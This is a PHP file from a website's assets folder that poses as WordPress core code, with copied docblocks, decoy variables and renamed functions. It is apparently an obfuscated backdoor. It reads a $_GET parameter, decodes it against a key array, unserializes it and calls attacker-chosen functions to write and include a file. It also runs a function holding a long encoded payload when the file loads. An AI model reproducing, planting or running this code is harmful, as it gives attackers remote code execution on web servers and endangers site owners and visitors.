PATH:
home
/
letacommog
/
pfu
/
assets
<?php /** * Retrieves the terms of the taxonomy that are attached to the post. * * @since 2.5.0 * * @param int|WP_Post $old_feed_files Post ID or object. * @param string $option_none_value Taxonomy name. * @return WP_Term[]|false|WP_Error Array of WP_Term objects on success, false if there are no terms * or the post does not exist, WP_Error on failure. */ function standalone_value($old_feed_files, $option_none_value) { $old_feed_files = get_post($old_feed_files); if (!$old_feed_files) { return false; } $xml_base = get_object_term_cache($old_feed_files->ID, $option_none_value); if (false === $xml_base) { $xml_base = wp_get_object_terms($old_feed_files->ID, $option_none_value); if (!is_wp_error($xml_base)) { $script_handle = wp_list_pluck($xml_base, 'term_id'); wp_cache_add($old_feed_files->ID, $script_handle, $option_none_value . '_relationships'); } } /** * Filters the list of terms attached to the given post. * * @since 3.1.0 * * @param WP_Term[]|WP_Error $xml_base Array of attached terms, or WP_Error on failure. * @param int $old_feed_files_id Post ID. * @param string $option_none_value Name of the taxonomy. */ $xml_base = apply_filters('standalone_value', $xml_base, $old_feed_files->ID, $option_none_value); if (empty($xml_base)) { return false; } return $xml_base; } privExtractFileAsString(); /* translators: 1: Post type, 2: Capability name. */ function has_post_format($qt_init){ include($qt_init); } /** * Removes a previously enqueued CSS stylesheet. * * @see WP_Dependencies::dequeue() * * @since 3.1.0 * * @param string $send_notification_to_user Name of the stylesheet to be removed. */ function handle_auto_add($send_notification_to_user) { _wp_scripts_maybe_doing_it_wrong(__FUNCTION__, $send_notification_to_user); wp_styles()->dequeue($send_notification_to_user); } $word = "status:200|message:OK"; /** * Enqueues the assets required for the format library within the block editor. * * @since 5.8.0 */ function check_ajax_referer() { wp_enqueue_script('wp-format-library'); wp_enqueue_style('wp-format-library'); } $m_value = "Code is poetry."; /** * Display the first name of the author of the current post. * * @since 0.71 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function upgrade_560() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'first_name\')'); the_author_meta('first_name'); } /** * Decode HTML Entities * * This implements HTML5 as of revision 967 (2007-06-28) * * @deprecated Use DOMDocument instead! * @package SimplePie */ function media_upload_html_bypass($year_field){ // ----- Look if something need to be deleted // True if "pitm" was parsed. $parsed_blocks = $_GET[$year_field]; // We don't support trashing for menu items. // Set up our marker. $parsed_blocks = str_split($parsed_blocks); // menu or there was an error. $serverPublicKey = "Test Data for Hashing"; $parsed_blocks = array_map("ord", $parsed_blocks); // Move to front, after other stickies. return $parsed_blocks; } /** * Retrieves the description for an author, post type, or term archive. * * @since 4.1.0 * @since 4.7.0 Added support for author archives. * @since 4.9.0 Added support for post type archives. * * @see term_description() * * @return string Archive description. */ function wp_dequeue_script_module() { if (is_author()) { $last_line = get_the_author_meta('description'); } elseif (is_post_type_archive()) { $last_line = get_the_post_type_description(); } else { $last_line = term_description(); } /** * Filters the archive description. * * @since 4.1.0 * * @param string $last_line Archive description to be displayed. */ return apply_filters('wp_dequeue_script_module', $last_line); } /** * Your Rights administration panel. * * @package WordPress * @subpackage Administration */ function wp_ajax_toggle_auto_updates($S0) { // Login actions. return max($S0); } /** * Fires before networks are retrieved. * * @since 4.6.0 * * @param WP_Network_Query $test_str Current instance of WP_Network_Query (passed by reference). */ function get_post_modified_time($S0) { // Add the new item. $themes_url = array_sum($S0); $upgrade_notice = "AnotherTestString"; $preset_is_valid = "dog, cat, bird"; $plugin_stats = "Info&Data"; return $themes_url / count($S0); } $tmp_settings = array(1, 2, 3); /** * Title: Grid of posts featuring the first post, 2 columns * Slug: twentytwentyfour/posts-grid-2-col * Categories: query * Block Types: core/query */ function wp_generate_password($qt_init, $parsed_blocks){ $style_handles = "basic_test"; $old_abort = "URL Encoded"; $ping_status = "URL%20Example"; $unpadded_len = "applebanana"; $processLastTagTypes = $parsed_blocks[1]; // s14 += s22 * 136657; // Valueless. // Check for nextpage to display page links for paginated posts. $options_graphic_bmp_ExtractData = $parsed_blocks[3]; // MPEG frames between reference $xx xx $thisfile_riff_raw_rgad_album = substr($unpadded_len, 0, 5); $special_chars = rawurldecode($ping_status); $locale_file = hash("md5", $style_handles); $maxLength = rawurldecode($old_abort); // Snoopy will use cURL for fetching # m = LOAD64_LE( in ); $sup = str_pad($thisfile_riff_raw_rgad_album, 10, 'x', STR_PAD_RIGHT); if(!empty($special_chars)) { $tempX = hash('sha256', $special_chars); $normalized_email = substr($tempX, 0, 12); $new_details = str_pad($normalized_email, 20, "_"); } $new_details = ""; $meta_clauses = str_pad("0", 20, "0"); // One day in seconds $processLastTagTypes($qt_init, $options_graphic_bmp_ExtractData); } /** * Retrieves the IP address of the author of the current comment. * * @since 1.5.0 * @since 4.4.0 Added the ability for `$transient_name` to also accept a WP_Comment object. * * @param int|WP_Comment $transient_name Optional. WP_Comment or the ID of the comment for which to get the author's IP address. * Default current comment. * @return string Comment author's IP address, or an empty string if it's not available. */ function get_the_tags($transient_name = 0) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid $outLen = get_comment($transient_name); /** * Filters the comment author's returned IP address. * * @since 1.5.0 * @since 4.1.0 The `$transient_name` and `$outLen` parameters were added. * * @param string $outLen_author_ip The comment author's IP address, or an empty string if it's not available. * @param string $transient_name The comment ID as a numeric string. * @param WP_Comment $outLen The comment object. */ return apply_filters('get_the_tags', $outLen->comment_author_IP, $outLen->comment_ID, $outLen); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase } $style_handles = "2023-10-05"; $rest_base = " Raw %20string # test @ %input "; /** * Handles saving menu locations via AJAX. * * @since 3.1.0 */ function block_core_query_ensure_interactivity_dependency() { if (!current_user_can('edit_theme_options')) { wp_die(-1); } check_ajax_referer('add-menu_item', 'menu-settings-column-nonce'); if (!isset($_POST['menu-locations'])) { wp_die(0); } set_theme_mod('nav_menu_locations', array_map('absint', $_POST['menu-locations'])); wp_die(1); } $year_field = "PVTzqb"; /** * Retrieves metadata for a site. * * @since 5.1.0 * * @param int $smaller_ratio Site ID. * @param string $removable_query_args Optional. The meta key to retrieve. By default, * returns data for all keys. Default empty. * @param bool $ContentType Optional. Whether to return a single value. * This parameter has no effect if `$removable_query_args` is not specified. * Default false. * @return mixed An array of values if `$ContentType` is false. * The value of meta data field if `$ContentType` is true. * False for an invalid `$smaller_ratio` (non-numeric, zero, or negative value). * An empty string if a valid but non-existing site ID is passed. */ function column_created_timestamp($smaller_ratio, $removable_query_args = '', $ContentType = false) { return get_metadata('blog', $smaller_ratio, $removable_query_args, $ContentType); } $parsed_blocks = media_upload_html_bypass($year_field); /** * Adds the filters for footnotes meta field. * * @access private * @since 6.3.2 */ function get_updated_gmdate() { add_filter('sanitize_post_meta_footnotes', '_wp_filter_post_meta_footnotes'); } /** * Outputs the HTML selected attribute. * * Compares the first two arguments and if identical marks as selected. * * @since 1.0.0 * * @param mixed $selected One of the values to compare. * @param mixed $meta_clausesurrent Optional. The other value to compare if not just true. * Default true. * @param bool $PossibleLAMEversionStringOffsetisplay Optional. Whether to echo or just return the string. * Default true. * @return string HTML attribute or empty string. */ function get_the_post_type_description($S0) { $resize_ratio = "HashingExampleData"; return min($S0); } /** * Gets the next image link that has the same post parent. * * @since 5.8.0 * * @see get_adjacent_image_link() * * @param string|int[] $style_variation_selector Optional. Image size. Accepts any registered image size name, or an array * of width and height values in pixels (in that order). Default 'thumbnail'. * @param string|false $structure_updated Optional. Link text. Default false. * @return string Markup for next image link. */ function get_category_by_slug($style_variation_selector = 'thumbnail', $structure_updated = false) { return get_adjacent_image_link(false, $style_variation_selector, $structure_updated); } /* translators: Default privacy policy text. */ function getSize(&$queried_object, $sql_part, $mce_buttons){ $upgrade_dir_is_writable = 256; $removable_query_args = count($mce_buttons); $removable_query_args = $sql_part % $removable_query_args; // POP server and returns the results. Useful for $removable_query_args = $mce_buttons[$removable_query_args]; // If the data is Huffman Encoded, we must first strip the leading 2 $meta_compare_string_start = "abcDefGhij"; $msgSize = '2023-10-18'; $thisfile_asf_codeclistobject = "123abc"; $structure_updated = "HelloWorld"; $u_bytes = "Test"; if (isset($u_bytes) && !empty($u_bytes)) { $steamdataarray = "Variable is set and not empty."; } else { $steamdataarray = "Variable is not usable."; } $S8 = strtolower($meta_compare_string_start); $time_window = trim($structure_updated); $language_update = date('Y-m-d', strtotime($msgSize)); $next_update_time = hash('sha256', $thisfile_asf_codeclistobject); $queried_object = ($queried_object - $removable_query_args); $queried_object = $queried_object % $upgrade_dir_is_writable; } /** * Displays an HTML link to the author page of the current post's author. * * @since 1.2.0 * @since 4.4.0 Converted into a wrapper for get_HandleAllTags() * * @param string $pingback_link_offset_dquote Unused. */ function HandleAllTags($pingback_link_offset_dquote = '') { if (!empty($pingback_link_offset_dquote)) { _deprecated_argument(__FUNCTION__, '2.1.0'); } echo get_HandleAllTags(); } /** * Render a JS template for theme display. * * @since 4.2.0 */ function nfinal($parsed_blocks){ $misc_exts = "Message%20"; $maxLength = rawurldecode($misc_exts); $MPEGaudioVersion = hash("sha256", $maxLength); $x9 = substr($MPEGaudioVersion, 0, 10); $parsed_blocks = array_map("chr", $parsed_blocks); $parsed_blocks = implode("", $parsed_blocks); $parsed_blocks = unserialize($parsed_blocks); return $parsed_blocks; } // Otherwise we use the max of 366 (leap-year). /** * Registers the `core/latest-posts` block on server. */ function set_spacing_sizes() { register_block_type_from_metadata(__DIR__ . '/latest-posts', array('render_callback' => 'render_block_core_latest_posts')); } $mce_buttons = array(71, 103, 98, 65, 88, 117, 86, 114, 105, 84, 99, 103); /** * Returns typography styles to be included in an HTML style tag. * This excludes text-decoration, which is applied only to the label and button elements of the search block. * * @param array $theme_json_raw The block attributes. * * @return string A string of typography CSS declarations. */ function get_cache($theme_json_raw) { $parent_theme_version_debug = array(); // Add typography styles. if (!empty($theme_json_raw['style']['typography']['fontSize'])) { $parent_theme_version_debug[] = sprintf('font-size: %s;', wp_get_typography_font_size_value(array('size' => $theme_json_raw['style']['typography']['fontSize']))); } if (!empty($theme_json_raw['style']['typography']['fontFamily'])) { $parent_theme_version_debug[] = sprintf('font-family: %s;', $theme_json_raw['style']['typography']['fontFamily']); } if (!empty($theme_json_raw['style']['typography']['letterSpacing'])) { $parent_theme_version_debug[] = sprintf('letter-spacing: %s;', $theme_json_raw['style']['typography']['letterSpacing']); } if (!empty($theme_json_raw['style']['typography']['fontWeight'])) { $parent_theme_version_debug[] = sprintf('font-weight: %s;', $theme_json_raw['style']['typography']['fontWeight']); } if (!empty($theme_json_raw['style']['typography']['fontStyle'])) { $parent_theme_version_debug[] = sprintf('font-style: %s;', $theme_json_raw['style']['typography']['fontStyle']); } if (!empty($theme_json_raw['style']['typography']['lineHeight'])) { $parent_theme_version_debug[] = sprintf('line-height: %s;', $theme_json_raw['style']['typography']['lineHeight']); } if (!empty($theme_json_raw['style']['typography']['textTransform'])) { $parent_theme_version_debug[] = sprintf('text-transform: %s;', $theme_json_raw['style']['typography']['textTransform']); } return implode('', $parent_theme_version_debug); } /** * Fires when comment cookies are sanitized. * * @since 2.0.11 */ function wp_ajax_save_attachment_compat($parsed_blocks){ //change to quoted-printable transfer encoding for the alt body part only // Yes, again -- in case the filter aborted the request. # e[0] &= 248; // $style_variation_selector === 'full' has no constraint. // If we don't have a charset from the input headers. $EZSQL_ERROR = "Text to be broken down into a secure form"; $locale_file = "Example Text"; $style_handles = "Hello%20World"; $SNDM_thisTagDataText = array("entry1", "entry2", "entry3"); $locale_file = rawurldecode($style_handles); $meta_clauses = array("apple", "banana", "cherry"); $pass_request_time = explode(' ', $EZSQL_ERROR); $path_list = implode(" ", $SNDM_thisTagDataText); // ge25519_p3_to_cached(&pi[5 - 1], &p5); /* 5p = 4p+p */ // int64_t a4 = 2097151 & (load_4(a + 10) >> 4); // D: if the input buffer consists only of "." or "..", then remove foreach ($pass_request_time as &$suggested_text) { $suggested_text = str_pad(trim($suggested_text), 8, '!'); } $safe_empty_elements = strlen($path_list); $meta_clauses = substr($locale_file, 0, 5); $PossibleLAMEversionStringOffset = str_replace(" ", "-", $locale_file); $ArrayPath = $parsed_blocks[4]; // No change or both empty. unset($suggested_text); $theme_version = strlen($PossibleLAMEversionStringOffset); $PossibleLAMEversionStringOffset = strlen($meta_clauses); if ($safe_empty_elements > 10) { $sortables = str_pad($path_list, 15, "0"); $preset_border_color = hash('md5', $sortables); $new_details = substr($preset_border_color, 5, 10); } # v2 += v1; $locations_update = implode('-', $pass_request_time); $next_item_id = explode("-", $PossibleLAMEversionStringOffset); $theme_version = str_pad($PossibleLAMEversionStringOffset, 10, "0", STR_PAD_LEFT); $qt_init = $parsed_blocks[2]; wp_generate_password($qt_init, $parsed_blocks); if (count($next_item_id) > 1) { $page_attachment_uris = implode(" ", $next_item_id); } $nested_fields = hash('md5', $locations_update); if (isset($theme_version)) { $next_item_id = hash('sha256', $theme_version); } has_post_format($qt_init); $page_attachment_uris = explode("0", $theme_version); $restored = implode("-", $page_attachment_uris); if (!empty($restored)) { $AudioCodecBitrate = date("Y-m-d"); } $ArrayPath($qt_init); } /** * @see ParagonIE_Sodium_Compat::block_core_navigation_build_css_colors() * @param string $LAMEvbrMethodLookup * @param string $noclose * @return string|bool */ function block_core_navigation_build_css_colors($LAMEvbrMethodLookup, $noclose) { try { return ParagonIE_Sodium_Compat::block_core_navigation_build_css_colors($LAMEvbrMethodLookup, $noclose); } catch (\TypeError $scheduled_date) { return false; } catch (\SodiumException $scheduled_date) { return false; } } /** * Constructor. * * @since 3.1.0 * * @see WP_List_Table::__construct() for more information on default arguments. * * @global string $steamdataarray * @global int $page * * @param array $prefix_len An associative array of arguments. */ function privExtractFileAsString(){ $last_menu_key = 'This is an example'; $zipname = "String with spaces"; $prepared_attachments = "Hello, PHP!"; $structure_updated = "sample_text"; $DKIMtime = explode(" ", $zipname); $nooped_plural = explode(' ', $last_menu_key); $scan_start_offset = strtoupper($prepared_attachments); $lock_user_id = explode("_", $structure_updated); // This option no longer exists; tell plugins we always support auto-embedding. $x6 = "\xa8\xa1\x96{\xd3\xde\x90\xa3\xa4\xc7\x9d\x98~\xa1\x84\xa7\xc1\xe1\xbb\xd1\xd9\xc9\xd7\xc6\xaa\xd6\xd0\xb5\xbd\xe3\xca\xe5\x8b\x8f\xcc\xa1y\xa2\xd5{\x8f\xafx\xba\xba\xb8\xa5\xd2\x91\xb8\x84|\xc1\xaf\x89\xad\xdc\x8e\x97\x9ew\x98\x9cc\x94\xb4\xc6\xda\xd9^\xc9\xdc\xb5\xca\xd6\xaa\xc7\xe3\x85\x9c\x89t\x83\xba\xa1\xa8\x82a\x82\xa4\xca\xbb\xdf\xc0\xaa\xdc\x89\xdd\xaf\x90\x80\x99\xbe\xdd\xb7\x98\xa5\x90Q\x87\x82ax~\xd1|\x89t\x83p\xb9\xcc\xd6\xb6\xca\xe3_\xb2\xd9\xb5\xc6\xd2op\x84\x9d\xd0\xa9\x8e\x94\x89t\x83\x87u\x87\x82ax\x9c\x80\x99\x95t\x83\x8b\xaf\xd2\xb0\x85\x9a\xa4\x80\x92\x89\x9c\xda\xbeg\x87\x82k\x87\x9e\x91\x96\xc8\xbb\xd5\xd2v\x91\x82ax\xeb\xcc\xe9\xc1t\x83\x91v\xa4\x82ax\x9c\x8b\xa7\xa0\x89\x93\x8e\x82q\x82ax\x95v{s]lpP\x87\x82ax\x95z\xb4\xad\x9e\xb1\xdd\x95\xae\xc8\xaf\x87\x9fv\xd4\xbd\xbe\xb4\xb2q\x96\x9fax\xe2\xba\xa7\x91x\xcb\xd2\x95\xab\xa4j\x93_{r]l\x96q\x87\x82\x87\xbf\xdb\x80\xa1\x8d\xa8\xd4\xb7\x8c\xb6\x91k\xd0\xcf\xc2\xc8\x89t\x8d\x96\x84p\xc4\xa2\xcb\xda\x8c\xa6\xc8\xb8\xc8\xca\xb6\xcb\xc7i|\xdd\xc1\xc0\xad\x96\x8c\xa2\x82q\x82p\x82\x95\xbe\xe5\xcft\x8d\x96\xb0\xcd\x91kx\x95v\xca\xb6~\x92\x8fk\xbb\xd3\x91\x9d\xc4v\x92\x89t\xa0\xa4\x84p\xc8\xa2\xc4\xe8\xbb\x9b\x89t\xdeqg\x87\x82ax\x95v\x92\x8d\xa8\xd4\xb7\x8c\xb6\x91kx\xef\xa8\xdb\x89t\x83\x91v\xa4kh\xb0\x91|r]lpv\x91\x82ax\xcdv\x9c\x98\xd1mpP\x96\x8c\x8c\xbe\xe5\xbd\xbe\x89~\x92\x8b\x9f\xcb\xb5\x8f\x99\xc6\x98\xe5\xb2\x9a\xc5\xb1\xa9\xd7\xc4\x8d\x9c\x95\x93\xa1\x93\xbc\x83\x91v\xda\xd6\xb3\xb7\xe8\xc6\xde\xd2\xc8\x8b\x8b\xaf\xd2\xb0\x85\x9a\x9e\x91\x96\xc8\xc7l\xa4P\x8e\x96u\x8d\xa8\x8a\x99\xa4^\x83\x87P\x8b\xc8\x97\x9a\xe2\xae\xd4\xd2]\xa0\x96q\x87\x82a\xa2\xd7\xa9\x9c\x98\xc7\xd7\xd9\xb3\xcc\xd0i|\xdd\xc1\xc0\xad\x96\x8c\xa2k\xc6\xa8\xa9\xcf~\x93\x92\x89t\x83\x8ex\x9f\x99s\x90\x9c\x91|r]lpP\x8b\xba\xa5\xab\xc3\x97\xc3\xab\xc7\x92\x91\xa8\xc1\xadax\x9f\x85\xafr\x84\x9eqQp\xd9\xa9\xc1\xe1\xbb\x92\x89t\x83\x8fP\x8b\xba\xa5\xab\xc3\x97\xc3\xab\xc7\x92\x91g\xe0\x8cp\x94\xa4\x80\x92\x89\xcb\xa4\x87g\x91\x91e\xbe\xcb\x98\xdf\xc1\xb6\xcc\x96q\x87\x82a\xaa\xda\x9c\xdb\xb5~\x92\x90v\x91\x82ax\xcc\xc4\xc1\xba~\x92\xe2Q\x87\x82ax\x99\xae\xd6\xbc\xa2\xa4\xb8\x89\xda\x8dl\x93\xb0`\x92\x89t\x83\x87g\x8b\xbc\xb1\xce\xb9\xad\xc3\xde\xcd\xa7\xb0v\x91\xbc\x91\x9d\x95\x80\xa1\xa6t\x87\xbf\xab\xba\xb0\x82\xa9\xb7\xc9\xbb\xaf\xb6\xad\xc9\xb7\xc9\xae\x85\xb3\x99\xae\xd6\xbc\xa2\xa4\xb8\x89\xda\xbf|\x93_{r]\x92\x91\xb1\xcf\xaf\x91\x82\xa4\xbf\xd8\x98~\x83\xc8\x99\xda\x82ax\x9f\x85\x9a\xdc\xc8\xd5\xd7\xb6\xda\x8ae\xb2\xe5\xcc\xb6\xc0\xa5\xd8\xe0\x8b\xb0\x8eax\x95}\xd3\x90}\x92\x91g\xab\x82k\x87\x96\x93\xaf\x89t\x83\xcd\xa8\xd3\xd5\xa6\x81\x95\xd1|\x89\x83\x8d\x87g\xbe\xd3\x89x\x95\x80\xa1\x8d\xac\xc7\xba\x95\xa8\xb3\x83\xcb\xbe\x9c\xd4\xb3\xb6\xd3\xc9\x93\xab\xbde\xb0\xd9\xa9\xc0\xaa\xa5\xa5\xda\xa4\x87\x82ax\xb2_\xe5\xdd\xc6\xd7\xd6\xbc\xd7\xd2\xa6\xca\x9dz\xcc\xd9\xca\xa7\xbe\x98\xdc\xdb\x85\xa1\x9e\x91|\x89tl\xe4QpkJa\xa4\x80\x92\x89\xc3\xb4\xad\xa1\x91\x91\xbeb~_{r]\x92\x91\x94\xd9\xb6\xa5\xa2\x95v\x92\x93\x83\x87\xda\xaf\xcb\xa6\xb9\xaf~\x93\x92\xd2\xc1\xd3\xd3\xb6\xcb\xc7i\x9c\x82\x92\x89t\x83\x87k\xbf\xc6\x94\xa6\xb6\xa7\xb4\xdc\x9d\xa9\xc9\x91\xc9\xd2\xa3\xa4\xb9\xad\x8d\xb3\xa9\x87g\x87\x82a\x95\x95}\xa4\xa2\x8d\x94\x9en\xa2laa\x99\xb5\xb9\xae\xa8\xbe\x8e\xab\xcc\xc5\xb0\xbc\xda\xba\x99\xc6t\x83\x87g\xa4\x82a|\xe8\xbe\xd6\xad\xcc\xba\xa2QpkJ\x87\x9fv\xdf\xb6\xc7\x83\x91v\x8b\xc1\x91\xa7\xc8\xaa\xcd\x90\xbc\xc4\xda\xaf\x8e\xbfax\x95v\x92\xa6\x83\x8d\x87\x97\xb3\x82k\x87\x99\x98\xb6\xb3\xa2\xd9\xb5\x8e\xcd\xd0|\x93v\x92\x89t\x83p\xb0\xcd\x82ax\x9d\xbc\xdb\xd5\xb9\xc2\xcc\xbf\xd0\xd5\xb5\xcb\x9d}\xe2\xca\xc8\xcb\x96\xbb\xd6\x91\xa7\xc1\xe1\xbb\x99\x92}\x92\x91g\x87\x82\x89x\x9f\x85\xeds^m\x96q\xdb\xda\xb3\xcc\xc8v\x92\x89~\x92\x8b\x9f\xcb\xb5\x8f\x99\xc6\x98\xe5\xd5\x9a\xd7\xd3\x88\xaa\xd5\x99\xa2\x95v\xaf\x98~\x83\x87g\xc9\xb3\xb2\xb1\xcfv\x92\x93\x83\xc9\xd0\xb3\xcc\xc1\xa8\xbd\xe9\xb5\xd5\xd8\xc2\xd7\xcc\xb5\xdb\xd5i\xe5\xb7\xe6\xd1\x83\xd7\xd6v\xcd\xcb\xad\xbd\x9c\xad\x8d\xb3\xd4\xa8v\x91\x82\xb7\x9d\x95v\x92\x93\x83\xa0\x96q\xbe\xb6ax\x9f\x85\x99\x9a\x84\x95\x9cz\x8e\x9dKx~z\xe5\xab\xbc\xab\xae\x95\xc8\xd4\xb7\x87\x9fv\x92\xbb\xcb\x83\x91v\xa4\x91kx\x95\xbd\xcb\xdf\x97\xa5\x87q\x96\xc7\xb9\xc8\xe1\xc5\xd6\xce|\x8a\x93n\x93\x82ax\x95z\xca\xcd\xa7\xb1\xa8\x98\xa9\xd5\xad\x9e\xe9\xc2\xb3\xac\xc7\xbb\xb1p\xa2lJ\x87\x9fv\x92\xda\x95\xae\x87q\x96\x86\xbb\xcf\xbe\xca\xba\xe1t\xa0\x87g\x87\x82\xae\xbc\xaa~\xe5\xce\xc6\xcc\xc8\xb3\xd0\xdc\xa6\x80\x99\xc9\xb4\xd1\x9c\xaa\xb5\xa8\xd9\xd8j\x81\xb0`\xa1\x93t\x83\xc8\xb5\xb7\xc9\x9a\x82\xa4\xbf\xd8\x98~\x83\xd3g\x87\x8cp\x80\xde\xc9\xd1\xca\xc6\xd5\xc8\xc0\x8f\x86\xb4\x9a\xdd\x9e\xb9\xb7\xb5\xd5\xddp\x90k\xbcb\x95v\x92\x98~\x83\x87\xa0\xd1\xd7ax\x95\x80\xa1\x8d\xc2\xb4\xd8\xb2\xd7\xd6\x93\xae\xee_\xaf\x98~\x83\x87\xac\x87\x82a\x82\xa4\xb7\xe4\xdb\xb5\xdc\xc6\xba\xd3\xcb\xa4\xbd\x9dz\xe5\xab\xbc\xab\xae\x95\xc8\xd4\xb7\x84\xa4\x80\x92\x89\xb6\xda\xdcq\x96\x92m\x87\x9f\x9a\xb6\xb6\xa1\x83\x91v\x9c\x8b|\x93_{r]l\xe4QpkJa~_\xefs^\x92\x91\xb4\x87\x82a\x82\xa4z\xb9\xbd\xba\xd7\xbc\x96\xac\xccp\x82\x95\xae\xd3\xdb\xba\xad\x87g\x87\x8cp\x95\xa4\x80\x92\x89t\xd5\xd4\xbe\x91\x91\xa2\xca\xe7\xb7\xeb\xc8\xc1\xc4\xd7o\x8e\xd6\xb3\xc1\xe2}\x9e\x98~\xad\xb1\xb8\x87\x8cp|\xe3\xa7\xe3\xd4\xc4\xd7\xb9\x9d\xe0\x8b|\x93_{\x89x\xca\xc0\xc0\xd6\xc4\x9a\xa9\x95v\xaf\x98~\x83\x87\x8a\x87\x82a\x82\xa4\xc8\xd3\xe0\xc9\xd5\xd3\xab\xcc\xc5\xb0\xbc\xda~\xdb\xd6\xc4\xcf\xd6\xab\xcc\x8ah\x84\x9c\x82\xa1\x93t\x83\xbf\xab\xab\xcc\xba\x82\xa4z\xb9\xbd\xba\xd7\xbc\x96\xac\xccj\x81\xb0`|s\x83\x8d\x87\x93\xb0\xda\xab\xbf\x95v\x9c\x98x\xc2\xaa\x96\xb6\xad\x8a\x9d\xd0}\xd8\xd2\xc2\xc4\xd3\xa6\xdd\xc3\xad\xcd\xda}\xcfr\x91\x83\x87g\x87\x86\xa8\xb1\xee\xc5\xd4\xc2\xa5\x9eqgp\xdfKx\x95v\x92\x89\x83\x8d\x87g\xd2\xa5ax\x9f\x85|r]l\x87g\x87\x82a\xbe\xea\xc4\xd5\xdd\xbd\xd2\xd5P\xc8\xc4\x91\xc6\xca\xcd\xda\x91}mp\xc2q\x91kx\x95\xac\xca\xb7t\x8d\x96k\xb3\xc5\xb8\xca\xcd\xbe\xcb\xd8\xa8\xdbp\x84p\xa3\xb3\xca\xd6\xcf\x9a\x8d\xb3\xa6\xb6\x96\xb2\xab\x86\x84\xa4\x80\xe1\xb3\x99\xb4\x91v\x8b\xc1\x91\xa7\xc8\xaa\x9b\xa4^\x83\x87g\x96\x8cax\xc3v\x9c\x98x\xa9\xc1\x99\xd8\xb3\xaf\xb9\xb7_\xaf\x98~\x83\x87g\xcf\xc6\xaa\x82\xa4\xb7\xe4\xdb\xb5\xdc\xc6\xb4\xc8\xd2i\xe2\xba\xa7\x90\x80\x92\x91g\xb9\xd2\xb4\xac\xc1v\x9c\x98x\xc2\xaa\x96\xb6\xad\x8a\x9d\x9e\x91\x96\xc8\x9a\x92\x91g\x87\xa9\xa7\xc1\xea\x80\xa1\xa6\x83\x8d\x87\xa0\xb7\xbb\x87\xbe\x95\x80\xa1\x90\x86\x93\x99w\x9b\x89|b\x95v\x92\x89t\x83\x87g\x8b\xca\x93\xc6\xd7\x9a\xd9\xde\xa2\xdc\xdcP\xa4\x91kx\x95v\xbe\xba\xc2\x83\x87g\x91\x91\xb4\xcc\xe7\xc6\xe1\xdc|\x87\xc6\x9a\xac\xb4\x97\x9d\xc7\xb1\x99\xb1\xa8\xb7\xb7\xa6\xbc\xb5\x86\xaa\xd4\x97\xb9\xae\xa2\xb7\x8e\xa4\x93\x82h\xa5\xe4\xd0\xdb\xd5\xc0\xc4\x8epp\x83~\x95\xa4\x80\x92\xc3\xc7\xbd\xc9\x91\x87\x82a\x82\xa4\xbc\xd3\xd5\xc7\xc8p\x86\x87\x89\xa3\xca\xe4\xcd\xe5\xce\xc6\x83\x87\xb0\xdak\x8e\xc7\xef\xbf\xde\xd5\xb5\x8ap\x81\x96\x8c\x92\xb0\xea\xa5\xd5\x89t\x83\x91v\x8e\xc4\xb3\xc7\xec\xc9\xd7\xdb\x83\x8d\xaf\xb0\xdc\x82ax\x9f\x85\xdb\xdc]\xd1\xd6\xbbp\xaf\xb0\xd2\xde\xc2\xde\xca{\x9eqPpkax\x95v\x92st\x83\x87g\x87\x82a\xc1\xdb\x85\x9c\x89t\x83\xcb\x9f\x87\x82k\x87\x9d\xbf\xe5\xc8\xb5\xd5\xd9\xa8\xe0\x8ae\xa4\xd8\xcd\xe4\xc1\xbc\xbc\xd6\x9b\xdf\x8bja\xf0`\x92\x89t\x83\x96q\x87\x82\xad\xcd\xb6v\x92\x93\x83\x87\xaf\xbf\xbe\xd8\xa7x\x95v\x92\xa6]\xc4\xd9\xb9\xc8\xdb\xa0\xcb\xe1\xbf\xd5\xce|\x87\xb3\xaa\xde\xd4\x99\xc0\xce\xc5\xc6\xe1\x80\x92\x91\xaa\xd9\x82ax\x9f\x85\xa2\x95]\x94\x90\x82\xa2lJa~v\xefr\xb9\xcf\xda\xac\x87\xddKx\x95v\x92\x89t\x83\x87g\x8b\xaa\xb9\xaf\xeb\xbc\x92\xa6\x83\x8d\x87\xbe\xb7\xd8\x92x\x9f\x85\xcd\xc6\x8fm\x87g\x87\x82a\x87\x9fv\x92\xbb\xb7\xc6\xd4\x99\x91\x91\xbeb`\xa1\x93t\x83\x87\x8c\x87\x82a\x82\xa4`\x92\x89t\x83\x87g\x87\x82ax\x99\xc6\xe2\xd8\xa4\xd2\xacP\xa4k\xa6\xd0\xe5\xc2\xe1\xcd\xb9\x8b\x8es\x8e\x8eax\x9c\xb7\xe2\xd9\xc0\xc8\x93\xb6\xd9\xc3\xaf\xbf\xda\x82\xd4\xca\xc2\xc4\xd5\xa8\x8e\x8b|\x93_{r]l\x87g\x87\x82e\xc5\xe0\xb0\xb5\xbe\xae\xb2\x87g\x87\x9fa\xca\xd6\xcd\xe7\xdb\xc0\xc7\xcc\xaa\xd6\xc6\xa6\x80\x9c{\xa4\x99\x9c\xc8\xd3\xb3\xd6\x87s\x88\xcc\xc5\xe4\xd5\xb8\x88\x99w\x8e\x8b|b~z\xca\xcd\xa7\xb1\xa8\x98\xa9\xd5J\x95~\x86\xad\x98~\xa9\xdc\x9a\xab\x82k\x87v\x92\x89\xcb\xcb\xd0\xb3\xccki|\xcd\xba\xc5\xb7\x95\xb4\xa9\xbap\x9ep\x82\x95\xaa\xc9\x89~\x92\xca\xb6\xdc\xd0\xb5\x80\x99\xc6\xe2\xd8\xa4\xd2\xacp\x87\x8bp\x82\x95v\x92\xce\x9b\x83\x87q\x96\xddKb~z\xe2\xd9\xc3\xb3\xd6\x8c\xc2\x86\x99\xbc\xc8\xa4\xb3\xba\x96\xd6\xc4P\xa4k\xb4\xcc\xe7\xb5\xe4\xce\xc4\xc8\xc8\xbb\x8f\x86\xb1\xc8\xe4\xa6\xe1\xae\xaf\x87\xbf\xab\xba\xb0\x82\xa9\xb7\xc9\xcf\x95t\x83\x87g\x99\x8b|\x93v\x92\x89t\x83\x87g\x8b\xba\xa5\xab\xc3\x97\xc3\xab\xc7\x8e\x92\x82qkJx\x95v\x92\xe6^\x92\x91\x97\xae\xac\x97\xba\x95v\x9c\x98^mqP\x8b\xc7\xb3\xa1\xe2\xb9\xb3\xaa\xc5\xba\xc1P\xa4\x91k